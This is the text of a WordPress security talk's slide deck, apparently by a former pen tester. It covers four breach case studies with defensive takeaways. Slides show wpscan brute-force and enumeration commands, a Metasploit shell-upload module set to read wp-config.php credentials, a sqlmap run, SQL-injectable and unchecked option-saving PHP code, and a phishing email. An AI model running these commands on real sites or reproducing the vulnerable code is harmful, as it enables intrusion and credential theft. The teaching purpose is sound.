Slide 1
Slide 1 text
TIM NASH
@tnash
Come to the
dark side
They have cookies...
Slide 2
Slide 2 text
What's the
worst that
can happen?
Slide 3
Slide 3 text
No content
Slide 4
Slide 4 text
No content
Slide 5
Slide 5 text
No content
Slide 6
Slide 6 text
Client email
Hi, we are going to be on
the One Show in about
two hours. Do you need to
do anything?
Slide 7
Slide 7 text
ruby wpscan.rb --url
Slide 8
Slide 8 text
Intelligence gathering
is fun!
Slide 9
Slide 9 text
No content
Slide 10
Slide 10 text
function df_save_options() {
$fields = $_REQUEST;
foreach($fields as $key => $field) {
if($key!="action") {
echo $key."-".$field;
update_option($key,$field);
}
}
die();
}
Totally legit...
Slide 11
Slide 11 text
No content
Slide 12
Slide 12 text
No content
Slide 13
Slide 13 text
WordPress
Platform Lead
at 34SP.com
Former Pen Tester
co-run WordPress Leeds
Ran a small dev agency
Speaks about security
around the country
Slide 14
Slide 14 text
Take aways from TV wonder
Use a child theme
Regularly code audit
Have control of your WAF
Get a disaster plan in place
Slide 15
Slide 15 text
Magazine Hack
Slide 16
Slide 16 text
Small print firm
moved online
Mom and Pop shop
Uses a single WordPress site
Shared hosting
No in house "dev" team
Slide 17
Slide 17 text
ruby wpscan.rb --url magazine-company.com
--wordlist timspassword.dict --username admin
Slide 18
Slide 18 text
ruby wpscan.rb --url magazine-company.com
--enumerate p
Slide 19
Slide 19 text
[+] Name: jetpack - v6.3.2
| Latest version: 6.3.2 (up to date)
| Last updated: 2018-07-04T10:01:00.000Z
| Location: https://magazine.com/wp-content/plugins/jetpack/
| Readme: https://magazine.com/wp-content/plugins/jetpack/
readme.txt
| Changelog: https://magazine.com/wp-content/plugins/jetpack/
changelog.txt
Slide 20
Slide 20 text
[+] Name: jetpack - v6.3.2
| Latest version: 6.3.2 (up to date)
| Last updated: 2018-07-04T10:01:00.000Z
| Location: https://magazine.com/wp-content/plugins/jetpack/
| Readme: https://magazine.com/wp-content/plugins/jetpack/
readme.txt
| Changelog: https://magazine.com/wp-content/plugins/jetpack/
changelog.txt
Slide 21
Slide 21 text
No content
Slide 22
Slide 22 text
/wp/wp-json/v2/users
Slide 23
Slide 23 text
No content
Slide 25
Slide 25 text
Typical WordPress update email
Slide 26
Slide 26 text
Please update your site at timstest.ismysite.co.uk to
WordPress 4.9.7.
Updating with Jetpack installed is easy and only takes a few
moments:
https://jetpack-wordpress.com/update/
timstest.isymsite.co.uk
If you experience any issues or need support, the volunteers
in the WordPress.org support forums may be able to help.
https://wordpress.org/support/
Keeping your site updated is important for security. It also
makes the internet a safer place for you and your readers.
The WordPress Team
Slide 27
Slide 27 text
Friendly familiar login....
Pre populated
username
whats
missing?
Slide 28
Slide 28 text
The actual wp.com login
Slide 29
Slide 29 text
>> From: WordPress.com
>> Date: 21 September 2018 at 05:18:53 BST
>> To: [email protected]
>> Subject: wordpress database upgrade required !
>>
>>
>>
>> DataBase Upgrade Required
>>
>> Dear Customer,
>>
>> Your WordPress database is out-of-date, and must be upgrade before
29/09/2018.
>>
>> The upgrade process may take a while, so please be patient.
>>
>> Click here to Upgrade Wordpress
>>
>>
>> Download our free mobile app today.
>> View stats, moderate comments, create and edit posts, and upload media.
>> Click here to learn more.
>> Automattic Inc. | 60 29th St. #343, San Francisco, CA 94110
Slide 30
Slide 30 text
Take aways from our spear phishing
attack
Never click untrusted links
Enable two-factor
authentication
Limit administrator users
Don't use the same
password on ever site
Slide 31
Slide 31 text
No content
Slide 32
Slide 32 text
Charity Hack
Slide 33
Slide 33 text
Watford Children
Charity
Separated Brochure site
Sharepoint/Exchange Server
on site IT Manager
3rd party developers for site
Slide 34
Slide 34 text
No content
Slide 35
Slide 35 text
use exploit/shell/divi_revslider_shell_upload
set watfordcharity.com
set payload exec
set cmd cat wp-config.php
Slide 36
Slide 36 text
Slide 37
Slide 37 text
set cmd "ls wp-content/plugins"
Slide 38
Slide 38 text
What's the
worst that
can happen?
Slide 39
Slide 39 text
What's the
worst that
can happen?
Slide 40
Slide 40 text
No content
Slide 41
Slide 41 text
Take aways from our slider attack
Always keep things up to
date
Never rely on themes
licenses to get bundled
plugins
The DB is not a safe place
to store credentials
Slide 42
Slide 42 text
E-Commerce Site Hack
Slide 43
Slide 43 text
E-commerce site
hack
WooCommerce Powered Hop
100s of customers
Small Dev Team
Custom Theme and a range of plugins
Slide 44
Slide 44 text
https://
ecommerceexample.com/
wp-content/themes/custom/
dcss.php?id=1
Slide 45
Slide 45 text
python sqlmap.py -u https://
ecommerceexample.com/
wp-content/themes/custom/
dcss.php?id=1
Slide 46
Slide 46 text
Slide 47
Slide 47 text
query("SELECT * FROM
`{$tablename}` where `css_source`={$id}");
Slide 48
Slide 48 text
Slide 49
Slide 49 text
Take aways from our SQL attack
Custom Code is our
responsibility
Never Rely on a WAF thats
in the application
Always check endpoints for
SQL injections
Slide 50
Slide 50 text
Poisoning the
well
Small blogger
Running WordPress the first time
Get's supports mainly from Facebook forums
Slide 51
Slide 51 text
Without
trust we
can't have
security...
Slide 52
Slide 52 text
Take aways from our poison well
If someone says there an
issue, DO NOT DISMISS IT
Help people to understand
security
Security is everyone
responsibility
Slide 53
Slide 53 text
Security is your
responsibility
Slide 54
Slide 54 text
A bad actor
needs to be right
once....
Slide 55
Slide 55 text
We need to be
right all the time!
Slide 56
Slide 56 text
TIM NASH
@tnash | timnash.co.uk/security
Thank you very much!